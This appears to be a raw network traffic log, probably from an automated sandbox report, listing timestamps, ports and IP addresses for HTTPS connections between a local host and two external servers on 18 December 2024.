Dec 18, 2024 21:09:37.351336956 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.359672070 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.359841108 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.369046926 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.376636982 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.376810074 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.384900093 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.393405914 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.394674063 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.402399063 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.424227953 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.424318075 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.424441099 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.429213047 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.429558992 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.437558889 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.445789099 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.446007013 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.453191996 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.462395906 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.462606907 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.471051931 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.479135036 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.479351044 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.482743979 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.485666037 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.485841990 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.489258051 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.492258072 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.492414951 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.496249914 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.499135971 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.499366045 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.502580881 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.506958961 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.507288933 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.510149002 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.513462067 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.513679028 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.516184092 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.519615889 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.519903898 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.522862911 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.527137995 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.527303934 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.530242920 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.533584118 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.533752918 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.536550999 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.539855957 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.540004015 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.543725014 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.546916008 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.547086000 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.550112009 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.554049969 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.554241896 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.562664032 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.562839031 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.562875032 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.566843987 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.569535971 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.572415113 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.575746059 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.577866077 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.581136942 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.584419012 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.584604979 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.586627007 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.589601040 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.592740059 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.596093893 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.599467039 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.601561069 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.604748011 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.608611107 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.611386061 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.613073111 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.614353895 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.616563082 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.620042086 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.622876883 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.625171900 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.628429890 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.631807089 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.634963989 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.637115955 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.640001059 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.640235901 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.643199921 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.646428108 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.649796009 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.651860952 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.655141115 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.657669067 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.660748959 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.677107096 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.713311911 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:37.713553905 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:37.724092960 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.725718021 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.725986958 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.726229906 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.774353981 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:37.774444103 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:37.852803946 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.029407024 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.030709028 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.030879974 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.031230927 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.039027929 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.045231104 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.045339108 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.045614004 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.045644045 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.045981884 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.046019077 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.046632051 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.046667099 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.047358990 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.047394037 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.048046112 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.048082113 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.048257113 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.048738956 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.048774958 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.048804998 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.048834085 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.048861980 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.048890114 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.063220978 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.063304901 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.063657045 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.063692093 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.064095020 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.064106941 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.064143896 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.064275026 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.064310074 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.064553976 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.064888954 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.064924955 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.064953089 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.064986944 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.065568924 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.065572977 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.065606117 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.066281080 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.066317081 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.066345930 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.066389084 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.079483986 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.091180086 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.091875076 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.093115091 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.093522072 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.094748020 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.288288116 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.288383007 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.375968933 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.376079082 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.385462046 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.387734890 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.396616936 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.402470112 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.402491093 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.402667999 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.403175116 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.403204918 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.403800011 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.403981924 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.403997898 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.404648066 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.404664993 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.405313015 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.405332088 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.405344963 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.405544996 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.411416054 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.441529036 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.441577911 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.454035997 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.454258919 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.454443932 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.454447031 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.454463005 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.454477072 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.454879045 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.455451012 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:38.604139090 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.605411053 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.605606079 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.606106043 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.691373110 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.692665100 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.692816019 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:38.693049908 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.741626978 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:38.742275953 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.742367029 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:38.792783022 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.028569937 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.028940916 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.030211926 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.030376911 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.040452957 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:39.065351963 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.065381050 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.065567017 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.065813065 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.343759060 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.344779968 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.344942093 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.345196009 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.345335960 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.345598936 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.345603943 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.346692085 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.349571943 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.349807024 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.355297089 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.364975929 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.365048885 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.365061045 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.365072966 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.365389109 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:39.368211031 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:39.397188902 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:39.665090084 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.668458939 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.669137001 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:39.669419050 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:39.682490110 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.704720974 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.708061934 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:39.762156963 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.762278080 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.762485981 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:39.762526989 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.762557030 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:39.762762070 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:39.788801908 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:39.887617111 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.102005005 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.205471992 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.209764957 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.210048914 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.210282087 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.210484982 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.210521936 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.211088896 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.211127043 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.211812973 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.211848974 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.212480068 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.212517023 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.213179111 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.213226080 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.214095116 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.229604006 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.277381897 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.277690887 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.363538980 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.544054031 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.552516937 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.552680016 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.553323030 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.553667068 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.553894043 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.554284096 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.554321051 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.554860115 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.554896116 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.555581093 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.555617094 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.556312084 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.556346893 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.557008982 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.557044983 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.557691097 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.557725906 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.557759047 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.558336020 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.558368921 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.558590889 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.567213058 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.567395926 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.567802906 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.567840099 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.568342924 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.591939926 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.598438025 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.598448992 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.598809004 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.598819971 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.599379063 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.599473953 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.599500895 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.599514008 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.600123882 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.600136042 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.600954056 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.600966930 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.601573944 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.601587057 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.601903915 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.613809109 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.613929033 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.613940954 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.614557028 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.614877939 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.614890099 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.615619898 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.615632057 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.616301060 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.616312981 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.616647959 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.617712021 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.629931927 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.630147934 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.630160093 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.630841970 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.630853891 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.631616116 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.631628036 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.632252932 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.632266045 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.632858992 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.633050919 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:40.646377087 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.646687031 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.646698952 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.647341967 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.647357941 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.648045063 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.648063898 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.648739100 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.648775101 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.649468899 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:40.650249004 CET	62192	443	192.168.2.9	23.44.203.15
